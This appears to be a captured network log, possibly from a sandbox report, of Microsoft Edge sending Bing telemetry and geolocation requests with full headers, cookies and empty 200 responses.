%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920582%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1733306920763%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22HotelsLGWidget%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1733306920799%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22HotelsLGWidget%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920858%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267502a30b43d42db97a6d5f3260af01d%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306920524%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267502a30b43d42db97a6d5f3260af01d%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306920524%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306920550%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306920550%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306920550%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920582%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1733306920763%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22HotelsLGWidget%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1733306920799%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22HotelsLGWidget%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920858%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b0e7
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920858%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920858%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b0ee
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306920888%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b0f0
GET

https://www.bing.com/geolocation/write?isBlocked=true&sid=1389AFCAD5F46BB6263EBA81D45C6A43&clientsid=undefined

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /geolocation/write?isBlocked=true&sid=1389AFCAD5F46BB6263EBA81D45C6A43&clientsid=undefined HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306929.7f1b0ec
GET

https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920891%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306920891%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=00ce9ee6199e4a5db1785c0696c690a3&aqs=edge.0.69i59j0l6.4970j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 47893
content-type: application/javascript; charset=utf-8
cache-control: private
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a31d40c41779ffa250f85203d2d
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-frame-options: DENY
